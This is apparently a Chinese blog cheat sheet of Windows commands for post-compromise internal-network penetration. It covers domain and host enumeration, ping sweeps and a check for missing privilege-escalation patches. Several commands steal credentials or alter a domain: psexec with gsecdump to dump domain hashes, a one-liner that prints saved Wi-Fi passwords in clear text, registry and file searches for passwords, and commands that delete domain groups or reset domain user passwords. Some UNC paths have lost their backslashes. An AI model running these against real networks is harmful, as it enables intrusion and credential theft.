• Windows下内网渗透常用命令总结


    域内信息收集常用命令

    net group /domain //获得所有域用户组列表

    net group zzh /domain //显示域中zzh组的成员

    net group zzh /del /domain //删除域中zzh组

    net group zzh andy /del /domain //删除域内zzh 群组中的成员

    andy net group zzh /add /domain //增加zzh域中的群组

    net group "domain admins" /domain //获得域管理员列表

    net group "enterprise admins" /domain //获得企业管理员列表

    net localgroup administrators /domain //获取域内置administrators组用

    (enterprise admins、domain admins) net group "domain controllers" /domain //获得域控制器列表

    net group "domain computers" /domain //获得所有域成员计算机列表

    net user /domain //获得所有域用户列表

    net user someuser /domain //获得指定账户someuser的详细信息

    net accounts /domain //获得域密码策略设置,密码长短,错误锁定等信息

    net view /domain //查询有几个域, 查询域列表

    net view /domain:testdomain //查看 testdomain域中的计算机列表

    nltest /domain_trusts //获取域信任信息

    net user domain-admin /domain //查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息

    net config Workstation //查询机器属于哪个域

    net time /domian //查询主域服务器的时间

    echo %logonserver% //查看登陆到这台服务器的计算机名

    net time \192.168.50.1 //查询远程共享主机192.168.50.1的时间

    net use \IPipc$ password /user:username@domain //ipc$域内连接,拿下文服的时候,可以结合菜刀去建立ipc连接,然后下载和阅读想要的文件

    net view \dc1.zzhsec.com //查看域控共享情况

    dir \dc1.zzhsec.comSYSVOL /s /a > sysvol.txt //列出sysvol日志记录

    xcopy \dc1.zzhsec.comsysvol.txt sysvol.txt /i /e /c //远程拷贝到本地sysvol日志

    net user /domain zzh 123.qwe //修改域内用户密码,需要管理员权限

    mstsc /admin //远程桌面登录到console会话解决hash无法抓出问题

    gpupdate/force //更新域策略

    psexec \192.168.50.3 -u administrator -p zzh1234 -c gsecdump.exe -u //从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来

    gsecdump -a //获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值

    tasklist /S ip /U domainusername /P /V //查看远程计算机进程列

    基本操作常用命令

    ipconfig/all //查看IP地址

    ipconfig /release //释放地址

    ipconfig /renew 重新获取Ip地址

    whoami //查询账号所属权限

    systeminfo //查询系统以及补丁信息

    tasklist /svc //查看进程

    taskkill /im 进程名称

    (cmd) //结束进程

    taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程)

    wmic qfe get hotfixid //查看已安装过得补丁,这个很实用

    wmic qfe list full /format:htable > hotfixes.htm //详细的补丁安装

    wmic qfe //查询补丁信息以及微软提供的下载地址 ping hostname(主机名) //显示该机器名的IP

    query user //查看管理员最近登陆时间

    net start //查看当前运行的服务

    net user //查看本地组的用户

    net localhroup administrators //查看本机管理员组有哪些用户

    net use //查看会话

    net session //查看当前会话

    net share //查看SMB指向的路径[即共享]

    wmic share get name,path //查看SMB指向的路径

    wmic nteventlog get path,filename,writeable //查询系统日志文件存储位置

    net use \IPipc$ password /user:username //建立IPC会话(工作组模式)

    net use z: \192.168.50.1 //建立映射到本机Z盘

    netstat -ano //查看开放的端口

    netstat -an | find “3389” //找到3389端口

    net accounts //查看本地密码策略

    nbtstat –A ip //netbiso查询

    net view //查看机器注释或许能得到当前活动状态的机器列表,如果禁用netbios就查看不出来

    echo %PROCESSOR_ARCHITECTURE% //查看系统是32还是64位 set //查看系统环境设置变量 net start //查看当前运行的服务

    wmic service list brief //查看进程服务

    wmic process list brief //查看进程

    wmic startup list brief //查看启动程序信息

    wmic product list brief //查看安装程序和版本信息(漏洞利用线索)

    wmic startup list full //识别开机启动的程序

    wmic process where(description="mysqld.exe") >> mysql.log //获取软件安装路径

    qwinsta //查看登录情况

    windows未打补丁情况,

    set KB2829361=MS13-046&set KB2830290=MS13-046&set KB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&set KB3077657=MS15-077&set KB3045171=MS15-051&set KB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&set KB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280) do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f /q /a a.txt //windows未打补丁情况,

    为提权做准备 REG query HKCU /v "pwd" /s //获取保存到注册表中的密码

    探索内网网络结构命令

    tracert IP //路由跟踪

     route print //打印路由表

    arp -a //列出本网段内所有活跃的IP地址

    arp -s (ip + MAC)//绑定mac与ip地址

    arp -d (ip + MAC) //解绑mac与ip地址

    nbtscan -r 192.168.16.0/24 //通过小工具nbtscan扫描整个网络

    netsh firewall show config //查看防火墙策略

    netsh firewall show state //查看防火墙策略

    查找文件位置命令

    dir /b/s config.* //查看所在目录所有config.为前缀的文件

    dir /b/s *.config //查看所在目录所有config.为后缀的文件

    findstr /si password *.xml *.ini *.txt //查看后缀名文件中含有password关键字的文件

    findstr /si login *.xml *.ini *.txt //查看后缀名文件中含有login关键字的文件

    copy con ftp.bat //创建ftp.bat批处理,然后输入ifconfig等命令,按ctr+z退出,并创建成功 copy con test.vbs //创建test.vbs脚本,输入脚本后,按ctr+z退出,并创建成功

    内网探测小脚本

    //一键获取wifi密码    for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

    //查看是否支持posershell if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)

    //批量扫描内网存活主机 for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

    //域机器对应 IP FOR /F "eol=- tokens=1 delims= " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

    //C段查找 for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"

    //B段查找 for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"

  • 相关阅读:
    JS事件学习笔记(思维导图)
    [logstash-input-file]插件使用详解
    echarts折线图,纵坐标数值显示不准确的问题解决
    IDEA 创建maven jar、war、 pom项目
    Lombok介绍、使用方法和总结
    Springboot2.0访问Redis集群
    springboot2.x 整合redis集群的几种方式
    SpringBoot 2.x 使用Redis作为项目数据缓存
    Springboot2.x使用redis作为缓存
    SpringBoot中application.yml基本配置详情
  • 原文地址:https://www.cnblogs.com/Sylon/p/11747456.html
Copyright © 2020-2023  润新知